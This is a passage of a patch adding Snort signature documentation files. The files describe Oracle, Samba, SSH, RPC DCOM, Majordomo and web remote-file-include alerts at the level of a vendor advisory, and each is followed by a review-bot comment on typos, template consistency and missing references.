+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
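Review bot: "running ona web server" should be "running on a web server". This is the third copy of the identical CGI boilerplate in the patch (see 1825.txt and 825.txt); the Summary's "known vulnerability" should be named so the document says something specific to SID 823.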
--- /dev/null
+++ b/doc/signatures/2896.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2896
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_priority_site
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
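Review bot: "Oracle Oracle9i" under Affected Systems repeats the vendor name; "Oracle 9i", as in 2613.txt, is consistent. The procedure name is split so that ". This procedure is included in" begins a line with a stray leading full stop; join it as "procedure drop_site_priority_site. This procedure is included in sys.dbms_repcat_conf." Both "None Known" lines and "Apply the appropriate vendor supplied patch" lack full stops, and Additional References is empty for a documented Oracle issue.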
--- /dev/null
+++ b/doc/signatures/1128.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1128
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/255.txt
@@ -0,0 +1,61 @@
+Rule:
+--
+Sid:
+255
+
+--
+
+Summary:
+This event is generated when an attempt is made to request a zone 
+transfer from a DNS Server
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+DNS Zone transfers are normally used between DNS Servers to replicate 
+zone information. Zone transfers can also be used to gain information 
+about a network.
+
+--
+Affected Systems:
+	All DNS Servers
+
+--
+Attack Scenarios:
+A malicious user may request a Zone Transfer to gather information 
+before commencing an attack.  This can give the user a list of hosts to 
+target.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+DNS Zone transfers may be part of normal traffic for DNS servers.
+
+--
+False Negatives:  
+None known
+
+--
+Corrective Action:
+Configure the DNS servers to only allow zone transfers from authorised 
+hosts, limit the information available from publicly acessible DNS 
+server by using Split Horizon DNS or separate DNS Servers for internal 
+networks.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
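Review bot: the header of this document deviates from the template: there is no blank line between "Rule:" and the separator, and a blank line has been inserted between the separator and "Summary:". Spelling: "unkown" should be "unknown" and "acessible" should be "accessible". The Summary sentence and "None known" lack full stops. Corrective Action is one long run-on; split it into two sentences: restrict zone transfers to authorised hosts, then limit what public servers expose via split-horizon DNS or separate internal servers.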
--- /dev/null
+++ b/doc/signatures/2948.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2948
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
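Review bot: this document is word-for-word identical to 2969.txt earlier in the patch. Since they describe two different SIDs, each should state what distinguishes its rule (for example the transport or port it inspects) so an analyst seeing either alert knows the difference. As in 2969.txt, the Impact line and the first Corrective Action line are missing terminating full stops.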
--- /dev/null
+++ b/doc/signatures/100000669.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000669
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "headlines.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "headlines.php" script 
+used by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
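Review bot: "running ona web server" should be "running on a web server". The Detailed Information section places the generic CGI credential-validation boilerplate after the Harpia-specific paragraph, and that boilerplate, together with the Attack Scenarios text about supplying credentials to an authentication mechanism, does not describe a remote file include; keep the remote-include paragraph and drop or rewrite the generic text. Formatting: the separators after the Sid, Affected Systems and Contributors blocks lack the preceding blank line, and there is a stray blank line after the final separator.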
--- /dev/null
+++ b/doc/signatures/465.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+465
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running the Internet Security Scanner tool.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running Internet Security Scanner "pinger" software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS158
+
+--
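Review bot: "legimately" in False Positives should be "legitimately". "Steven Alexander<alexander.s@mccd.edu>" needs a space before the address, and Max Vision's address is given as whitehats.org here but whitehats.com in the other documents in this patch; pick one. Corrective Action "Block inbound ICMP echo requests." is a blunt control that also breaks the legitimate troubleshooting use acknowledged under False Positives; worth saying so, or suggesting blocking only from untrusted sources.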
--- /dev/null
+++ b/doc/signatures/2911.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2911
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_snapshot_repschema
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
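Review bot: same defects as 2896.txt: "Oracle Oracle9i" repeats the vendor name, the procedure name is broken so that ". This procedure is included in" starts a line with a stray full stop (join as "procedure refresh_snapshot_repschema. This procedure is included in sys.dbms_repcat_sna."), the "None Known" lines and the Corrective Action line lack full stops, and Additional References is empty.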
--- /dev/null
+++ b/doc/signatures/2909.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2909
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_snapshot_support
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
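Review bot: Ease of Attack says "Simple." but neither it nor Attack Scenarios mentions that calling generate_snapshot_support requires an authenticated database session; the 2640.txt entry in this same patch states that its dbms_repcat procedure "requires an attacker to logon to the database with a valid username and password combination", and that precondition should be stated here too, since it changes how an analyst rates the alert. The procedure name is again broken across lines with a leading period (". This procedure is included in"); join it into one sentence. Additional References is empty; give at least the vendor alert the Corrective Action patch comes from, and drop the duplicated vendor in "Oracle Oracle9i".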
--- /dev/null
+++ b/doc/signatures/1324.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1324
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SSH daemon.
+
+--
+Impact:
+System compromize presenting the attacker with root privileges. Denial 
+of Service (DoS) on certain network devices.
+
+--
+Detailed Information:
+A flaw in the CRC32 compensation attack detection code may result in 
+arbitrary code execution with the privileges of the user running the SSH
+daemon (usually root).
+
+Some Netscreen devices may suffer a Denial of Service.
+
+Affected Systems:
+	OpenSSH versions prior to 2.2
+	Multiple Cisco network devices
+	Multiple Netscreen network devices
+	SSH Secure Communications prior to 1.2.31
+
+--
+Attack Scenarios:
+The attacker would need to send specially crafted large SSH packets to 
+cause the overflow and present the opportunity to write values to memory
+locations.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/945216
+
+Analysis by David Dittrich:
+http://staff.washington.edu/dittrich/misc/ssh-analysis.txt
+
+--
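Review bot: the "--" separator is missing before "Affected Systems:" (the section follows "Some Netscreen devices may suffer a Denial of Service." with only a blank line), which breaks the layout every other entry follows; add it. "compromize" in Impact should be "compromise". Attack Scenarios ("Exploit scripts are available") duplicates Ease of Attack ("Simple. Exploits are available."); keep one. The "OpenSSH versions prior to 2.2" line should be checked against the CERT advisory already linked under Additional References, since the first fixed version is what tells a reader whether their deployment is still in scope.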
--- /dev/null
+++ b/doc/signatures/3025.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3025
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
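Review bot: Detailed Information only says the bug is "in the way the smb daemon processes commands" and "in the allocation of memory"; the detail that tells the reader what the rule actually keys on appears only in Attack Scenarios ("a buffer containing the information for the access control lists to be applied to files in the smb query"). Move that into Detailed Information so the SMB request being matched is clear. Typos: "heterogenous" should be "heterogeneous", and "server.The problem" needs a space. Additional References is empty; "Samba 3.0.8 and prior" under Affected Systems should be backed by the Samba advisory that names the first fixed release, particularly since Corrective Action is only "Apply the appropriate vendor supplied patch".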
--- /dev/null
+++ b/doc/signatures/2674.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2674
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_delete_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
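Review bot: the package is given as "dbms_repcat." while the sibling Oracle entries in this patch qualify the package with its schema ("sys.dbms_repcat_sna.", "sys.dbms_repcat_conf."); use the same form ("sys.dbms_repcat") so add_delete_resolution can be located the same way. As in those entries, the procedure name is split across lines with a stray leading period (". This procedure is included in"), Affected Systems reads "Oracle Oracle9i", Ease of Attack "Simple." does not mention the database login needed to invoke the procedure, and Additional References is empty despite Corrective Action depending on a vendor patch.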
--- /dev/null
+++ b/doc/signatures/661.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+661
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a problem with Majordomo software that allows arbitrary commands to be executed on the server.
+
+--
+Impact:
+Attempted administrator access.  This is an attempt to execute a command on a server where Majordomo is installed. 
+
+--
+Detailed Information:
+Majordomo is an application that automates mailing list management.  An input validation error allows attackers to use a malformed email header as a command that will be executed on the host.  To be vulnerable, the server must use a list or a hidden list and the configuration file must specify an advertise or noadvertise option.  This has been documented as either a local or remote attack on the host. 
+
+--
+Affected Systems:
+Majordomo versions up to and including 1.94.4.
+
+--
+Attack Scenarios:
+An attacker can send a malformed e-mail header to the Majordomo host.  The host executes a command that facilitates access to the host.
+
+
+--
+Ease of Attack:
+Simple. Use an appropriate malformed header and supply a command that enables access to the host. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to Majordomo version 1.94.5 or higher.
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2310
+
+Arachnids:
+http://www.whitehats.com/info/IDS143
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0207
+
+
+--
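Review bot: Impact opens with "Attempted administrator access", but Detailed Information describes a command being executed on the host via a malformed email header, not administrator access; state the privilege the command runs with (the account Majordomo runs as) rather than implying root. The precondition sentence is hard to parse: "the server must use a list or a hidden list and the configuration file must specify an advertise or noadvertise option" reads as if any list qualifies, so spell out which configuration is required. "This has been documented as either a local or remote attack on the host" is vague; Attack Scenarios already says the attacker sends the header to the host, which is a remote attack, so say that. Layout: a blank line is missing between "Upgrade to Majordomo version 1.94.5 or higher." and the "--" before Contributors.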
--- /dev/null
+++ b/doc/signatures/2558.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2558
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
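Review bot: Detailed Information attributes the overrun to "poor checking of the length of an HTTP Header" and then, in the next sentence, to "a large invalid HTTP Request Method"; the method is not a header, and Attack Scenarios ("an HTTP Request Method of more than 432 bytes") confirms the method is the trigger, so drop the "HTTP Header" wording. The Affected Systems version strings contain stray spaces ("9.0.4 .0", "2.0 .0.4", "9.0.2 .3") that look like extraction artifacts; write them as 9.0.4.0, 2.0.0.4, 9.0.2.3 and so on. The False Negatives note on ports 7777 and 7778 is the most useful line in the entry, but "The rule should be configured" should name the port variable the reader has to change. Additional References is empty.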
--- /dev/null
+++ b/doc/signatures/3214.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3214
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
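Review bot: "Expoit" in Ease of Attack should be "Exploit". Attack Scenarios ("a request for a file with an overly long filename via a network share") does not obviously match Detailed Information, which says the trigger is "malformed data via RPC" sent to "an RPC port"; if the rule matches the long filename carried inside a DCOM RPC request, say so, otherwise a reader will expect SMB traffic rather than RPC. Corrective Action's firewall advice names TCP and UDP 135, 139 and 445, but nothing in the entry says which of those ports the rule itself inspects. Additional References is empty for a widely documented vulnerability; add the vendor bulletin.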
--- /dev/null
+++ b/doc/signatures/2877.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2877
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_site_priority_site
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
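Review bot: this entry is identical to the other sys.dbms_repcat_* entries apart from the procedure alter_site_priority_site and package sys.dbms_repcat_conf, and carries the same defects: the procedure name is split across lines with a stray leading period (". This procedure is included in"), Affected Systems reads "Oracle Oracle9i", Ease of Attack "Simple." omits the database login needed to call the procedure, and Additional References is empty. Since Corrective Action is only "Apply the appropriate vendor supplied patch", a reference to that patch is the one thing the reader needs most.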
--- /dev/null
+++ b/doc/signatures/1851.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1851
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
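Review bot: the entry never says what rule 1851 actually matches; Summary, Detailed Information and Attack Scenarios are generic web-server boilerplate ("attack scenarios are legion", "Many attack vectors are possible from simple directory traversal to exploitation of buffer overflow conditions"), and the same text appears word for word as the 1056.txt entry later in this patch. An analyst triaging this alert needs at least the URI or content string the rule looks for and the product it targets; without that, "False Positives: None known." and "Simple. Exploits exist." cannot be justified. Additional References is empty.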
--- /dev/null
+++ b/doc/signatures/100000802.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000802
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "index.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
